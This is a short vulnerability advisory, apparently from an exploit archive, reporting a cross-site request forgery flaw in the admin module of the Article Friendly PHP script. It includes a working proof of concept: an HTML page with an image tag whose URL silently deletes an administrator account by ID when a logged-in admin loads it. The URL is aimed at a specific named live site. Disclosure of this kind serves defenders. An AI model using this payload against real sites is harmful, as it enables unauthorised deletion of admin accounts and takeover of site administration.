Article Friendly suffers from a cross site request forgery vulnerability.
2289f4d4b96fe50966f5f60c77faa635832f9b6e4517c045697eb2c5f817986d
=======================================================================
Article friendly CSRF Vulnerability
=======================================================================
by
Pratul Agrawal
# Vulnerability found in- Admin module
# email Pratulag@yahoo.com
# company aksitservices
# Credit by Pratul Agrawal
# Site p4ge http://www.articlefriendly.com/
# Plateform php
# Proof of concept #
Targeted URL: http://www.familyfriendsphotos.com/admin/index.php?filename=adminlogin
Script to delete the Admin user through Cross Site request forgery
. ..................................................................................................................
<html>
<body>
<img src=http://www.familyfriendsphotos.com/admin/index.php?filename=adminuser&a=3&adminid=[USER ID] />
</body>
</html>
. ..................................................................................................................
After execution refresh the page and u can see that user having giving ID get deleted automatically.
#If you have any questions, comments, or concerns, feel free to contact me.